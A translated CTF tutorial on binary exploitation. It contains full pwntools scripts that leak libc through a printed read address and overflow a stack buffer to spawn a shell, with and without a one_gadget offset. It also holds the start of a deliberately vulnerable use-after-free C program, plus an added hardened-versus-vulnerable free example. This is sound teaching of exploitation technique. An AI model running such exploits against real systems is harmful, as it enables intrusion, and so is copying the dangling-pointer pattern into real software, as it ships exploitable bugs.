One_gadget combined with UAF: heap overflow vulnerability research - exploit warning - the black bar safety net

2019-04-19T00:00:00
ID MYHACK58:62201993760
Type myhack58
Reporter 佚名 (anonymous)
Modified 2019-04-19T00:00:00

Description


Overview: we first use a simple ROP problem to understand how One_gadget works, then use the ROP chain it provides to exploit a heap UAF vulnerability. Stack overflow is a major topic in CTF pwn and is well worth studying. This article is aimed at readers who already have some interest in stack overflows and stack exploitation. Experts are also welcome to correct me.

0x01 A simple ROP problem

Preparing the tools: first, two tools, ROPgadget and One_gadget. Both are used to find ROP chains. ROPgadget mainly finds gadgets ending in ret that we can chain together freely ourselves; One_gadget is more convenient, because the chain it finds gives a shell as soon as it is called. Before using either tool you need to know which libc version the program uses: run the program locally under gdb and use vmmap to check.

/lib/i386-linux-gnu/libc-2.23.so
$ cp /lib/i386-linux-gnu/libc-2.23.so libc-2.23.so    # copy it into the current directory to make debugging easier

The general syntax of the two tools is:

ROPgadget --binary <libc path>/<libc version> --only "pop|ret" | grep <register>
one_gadget <libc path>/<libc version>

One_gadget is the more convenient one: you only need to know the program's libc base address and to satisfy the constraint listed for the gadget (for example, the first gadget requires [esp+0x28] == NULL), and it automatically produces a ROP chain.

Topic analysis: the main function has no vulnerability, so look at the pwn function: its read call has a very obvious stack overflow. The program also leaks the address of read, so even with ASLR enabled the libc base address can be obtained. This is clearly a ROP exploit.

Leaking this address would normally itself require constructing a ROP chain, but the problem lowers the difficulty by printing it directly.

Then check the binary's protection mechanisms: only NX is enabled, and the machine also has ASLR on. There is no CANARY, so ROP alone is basically enough.

ROP solution I

#!/usr/bin/env python2

from pwn import *

# libc = ELF('/lib32/libc-2.27.so')    # alternative libc, not used here
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
p = process('./rop32')

gdb.attach(p, 'b execve\nc')

p.recvuntil('you:')

# Get the base address from the leaked address of read
libc_base = int(p.recvuntil('\n'), 16) - libc.symbols['read']
print libc_base

# Calculate the addresses of /bin/sh and execve
libc_bin_sh = libc_base + libc.search('/bin/sh').next()
libc_execve = libc_base + libc.symbols['execve']

# Construct the ROP chain: padding, execve, fake return address, then
# the arguments execve("/bin/sh", NULL, NULL)
send = 'a' * 0x3e + p32(libc_execve) + p32(0) + p32(libc_bin_sh) + p32(0) * 2
p.sendline(send)
p.interactive()

Besides constructing a ROP chain yourself, you can also use one_gadget to find the gadget address.

ROP solution II

#!/usr/bin/python2.7

from pwn import *
libc = ELF('libc-2.23.so')
p = process('./rop32')

gdb.attach(p)

context.log_level = 'debug'

p.recvuntil('let me help you:')
libc_base = int(p.recvuntil('\n'), 16) - libc.symbols['read']
print "libc_base=" + hex(libc_base)
One_gadget = libc_base + 0x3ac5e    # offset from one_gadget libc-2.23.so
payload = "A" * 0x3e + p32(One_gadget)
p.sendline(payload)
p.interactive()

From the test above you can see that one_gadget needs only a single address to get a shell. This property is very important in stack overflows, which is why one_gadget is used even more often in heap overflows.

0x02 UAF exploits

UAF, in full Use After Free, exploits a pointer to freed memory whose contents are then modified, in order to achieve arbitrary code execution. Two debugging techniques are needed:

1. set {unsigned char} 0x555555757420 = 0x70    # modify memory in gdb
2. Ctrl+C    # interrupt the program in gdb

Vulnerable code:

/* header names were lost in extraction; these cover the calls the code uses */
#include <stdio.h>     /* printf, scanf, setbuf */
#include <stdlib.h>    /* malloc, free */
#include <unistd.h>    /* read, alarm */

void helpinfo()
{
    printf("0: exit\n1: malloc\n2: write\n3: read\n4: free\n");
}

int main()
{
    long action;
    char *buf[20];      /* slot table of chunk pointers */
    long len;
    long t, i;
    setbuf(stdout, NULL);
    // alarm(10);
    printf("Welcome to CTF\n");
    printf("read:%p\n", &read);    /* leaks the address of read */
    helpinfo();
    while (1) {
        scanf("%ld", &action);
        switch (action) {
        case 0:
            printf("GoodBye!\n");
            return 0;
            break;
        /* cases 1-4 (malloc/write/read/free) continue on the next page of the article */
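The slot table above (char *buf[20]) is what the UAF turns on: once a chunk is freed, the pointer left in buf[] can still be used by the write and read menu entries. The following is an added example, not the article's program, that mirrors that layout with a constructed slot API and puts the dangling-pointer free beside a hardened free; the slot_* names and the buflen bookkeeping are assumptions of this example.

```c
/* Added example, not the article's program: a constructed slot table with the
 * same shape as its "char *buf[20]" menu, showing the free() pattern that
 * leaves a dangling pointer beside a hardened free that clears the slot. */
#include <stdlib.h>
#include <string.h>

#define NSLOTS 20
static char *buf[NSLOTS];       /* chunk pointers, as in the article's buf[] */
static size_t buflen[NSLOTS];   /* allocated size per slot (assumed bookkeeping) */

/* Allocate a chunk for slot i; refuses bad index, occupied slot or zero length. */
int slot_malloc(long i, size_t len) {
    if (i < 0 || i >= NSLOTS || buf[i] != NULL || len == 0) return -1;
    buf[i] = malloc(len);
    if (buf[i] == NULL) return -1;
    buflen[i] = len;
    return 0;
}

/* Vulnerable pattern: free() but keep the pointer, so a later write/read on
 * the same index dereferences freed (and possibly reallocated) memory. */
void slot_free_vuln(long i) {
    if (i < 0 || i >= NSLOTS) return;
    free(buf[i]);
}

/* Hardened form: refuse double free, then clear pointer and length so any
 * later write/read on the slot is rejected instead of touching freed memory. */
int slot_free_safe(long i) {
    if (i < 0 || i >= NSLOTS || buf[i] == NULL) return -1;
    free(buf[i]);
    buf[i] = NULL;
    buflen[i] = 0;
    return 0;
}

/* Copy data into a slot; rejects unallocated/freed slots and oversize writes. */
int slot_write(long i, const char *data, size_t len) {
    if (i < 0 || i >= NSLOTS || buf[i] == NULL || len > buflen[i]) return -1;
    memcpy(buf[i], data, len);
    return 0;
}

/* 1 if the slot still holds a pointer (dangling after slot_free_vuln), else 0. */
int slot_is_dangling(long i) {
    return (i >= 0 && i < NSLOTS && buf[i] != NULL) ? 1 : 0;
}
```

The same check is what a reviewer would ask for in the article's write and read cases: an index bound, a non-NULL slot, and a length bound before any memcpy or read() into the chunk.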
